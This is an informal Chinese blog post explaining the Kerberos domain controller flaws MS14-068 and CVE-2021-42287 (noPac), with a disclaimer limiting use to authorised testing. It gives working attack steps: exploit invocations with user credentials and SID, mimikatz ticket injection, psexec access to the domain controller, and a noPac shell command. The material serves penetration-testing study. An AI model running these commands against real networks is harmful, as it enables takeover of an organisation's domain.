首页 > 其他分享 >域控漏洞瞎讲

域控漏洞瞎讲

时间:2024-01-27 15:56:27浏览次数:24  
标签:tgs exe tgt ip 漏洞 pac 域控

域控漏洞初探(乱讲)

操作半天shell呢?
你别弄了,去机房插U盘吧
简单记录一下域控漏洞的原理

MS14-068

原理

1.AS通过PAC校验权限

2.在AS认证的时候,可以将include-PAC设置为false,得到一个不含pac的tgt

3.自己在tgt外加上md5“签名”的pac,将此数据包发送给tgs

4.TGS会使用md5验证pac,同时将其加在tgt(不是st)中并签名

可以用这个方式伪造一张S4U的tgt去操纵域控

image

漏洞利用

补丁编号:KB3011780

操作

查看自身sid:whoami /user
执行exp:ms-14-068.exe -u 域用户@域名 -p 域用户密码 -s 域用户sid -d 域控ip
获取到TGT文件以后,用mimikatz.exe将证书写入,从而提升为域管理员。
导入证书:mimikatz.exe kerberos::ptc 证书名

查看是否成功:dir \\域控ip\c$

连接域控:psexec64.exe \\域控ip cmd.exe -accepteula

CVE-2021-42287

原理

在tgs认证权限时,校验的username不存在时,会在其后面添加$符号,可以利用这一特性,伪造一个和域控机器账号同名的票据

设置saMAccountName(或者通过跨域[实际上是不行的])向tgs发起请求(tgs找不到用户)在用户名后加$成功伪造dc

S4U的请求和跨域无pac的请求,tgs都会返回新的pac

即可达成利用

ps:saMAccountName是身份标识符

image

利用

GitHub - Ridter/noPac:利用 CVE-2021-42278 和 CVE-2021-42287 模拟标准域用户的 DA

proxychains python3 noPac.py hack.cc.com/mgr13:'1qaz#EDC666' -dc-ip 10.2.3.4 -use-ldap -shell

直接一把梭

还有几个洞没写,事已至此先吃饭吧


相信国家相信党,黑客没有好下场
请遵守相关法律法规,文中技术仅用于有授权的安全测试,禁止用于非法活动!
本文章仅面向拥有合法授权的渗透测试安全人员及进行常规操作的网络运维人员。
在操作的过程中,您应确保自己的所有行为符合当地法律法规,且不得进行违反中国人民共和国相关法律的活动。作者不承担用户擅自使用相关技术从事任何违法活动所产生的任何责任。


标签:tgs,exe,tgt,ip,漏洞,pac,域控
From: https://www.cnblogs.com/Aixve/p/17991522

相关文章

  • 文件包含漏洞
    文件包含漏洞文件包含漏洞简介文件包含漏洞基础介绍文件包含函数的参数没有经过过滤或者严格的定义,并且参数可以被用户控制,这样就可能包含非预期的文件。如果文件中存在恶意代码,无论文件是什么类型,文件内的恶意代码都会被解析并执行。文件包含漏洞可能会造成服务器的网页被篡......
  • 【pwn】axb_2019_fmt32 --格式化字符串漏洞进一步利用
    照例检查程序保护情况堆栈不可执行,再导入ida看一下代码逻辑如上图此处代码有格式化字符串漏洞先找出偏移可以发现偏移是8那么我们可以利用printf泄露出libc地址,如何修改printf_got表为system的地址,然后再传入/bin/sh就可以getshellexp:frompwnimport*fromLibcSearc......
  • Spring Boot框架actuator配置不当漏洞
    漏洞描述【安全预警】ApacheDubbo远程代码执行漏洞、SpringBoot配置不当及微软1月补丁漏洞部分网站数据库存在SpringBoot配置不当漏洞,利用网站数据库SpringBoot漏洞可读取Redis数据库用户名和密码。连接数据库可查询掌握运维综合服务平台管理员口令哈希。漏洞等级......
  • 通付盾获2023年移动互联网APP安全漏洞治理优秀案例
    获工信部CAPPVD漏洞库技术支撑单位为深入贯彻落实《网络产品安全漏洞管理规定》,规范移动互联网App产品安全漏洞发现、报告、修补和发布等行为,提升网络产品提供者安全漏洞管理意识,探索最前沿的漏洞挖掘技术发展趋势和创新应用,在上级主管部门指导支持下,1月16日,中国软件评测中心(工业......
  • log4j-漏洞修复
    Log4j漏洞修复修复参考文档:https://www.cert.org.cn/publish/main/9/2021/20211215154225883558274/20211215154225883558274_.html1.log4j是什么ApacheLog4j是一个基于Java的日志记录组件文档:https://logging.apache.org/log4j/2.x/2.log4j漏洞是什么Log4j2组件在......
  • Redis整形溢出漏洞(CVE-2021-32761)及修复脚本
    今天的计划是修复线上的redis漏洞Redis整形溢出漏洞(CVE-2021-32761)及修复脚本目的:修复生产的redis漏洞,主要是整数溢出漏洞,但是过程中发现还有反弹shell漏洞(次要,毕竟需要密码)计划:获取生产的redis版本账号和密码在测试环境搭建反正环境漏洞的研究与证实测试环......
  • 如何防护网站存在的sql注入攻击漏洞
    SQL注入攻击是最危险的Web漏洞之一,危害性极大,造成的后果不堪设想,因此受到了大家的高度重视。那么你知道SQL注入攻击防范方法有哪些吗?SQL注入是一种网站的攻击方法。它将SQL代码添加到网站前端GETPOST参数中,并将其传递给mysql数据库进行分析和执行语句攻击。它是一种利用应用程序......
  • openeuler2203升级openssh9.4p1解决漏洞问题
    openeuler2203升级openssh9.4p1解决漏洞问题 1,使用rpmbuild将tar包打成rpm包,不喜欢编译升级的,使用RPM升级就方便多了。想使用openssh的源码包编译安装的,参考这里:OpenSSH-9.4p1(linuxfromscratch.org) 2,准备编译环境[root@centos7-31~]#  yuminstallrpm-buildzlib......
  • Nexpose v6.6.233 for Linux & Windows - 漏洞扫描
    Nexposev6.6.233forLinux&Windows-漏洞扫描Rapid7VulnerabilityManagement,ReleaseJan17,2024请访问原文链接:https://sysin.org/blog/nexpose-6/,查看最新版。原创作品,转载请保留出处。作者主页:sysin.org您的本地漏洞扫描程序搜集通过实时覆盖整个网络,随......
  • redis漏洞修复-使用redis普通用户启动redis服务程序(禁止root用户权限)
    2.Redis服务以root权限运行应用:Redis危险程度:高危风险描述:Redis服务以root权限运行,攻击者可通过Redis对服务器文件进行任意操作或者执行命令。通过查询命令获取敏感信息,通过写入公钥信息获取ssh登录权限等。如果Redis为root权限,攻击者则无需提权直接对服务器进行操作。验证信息......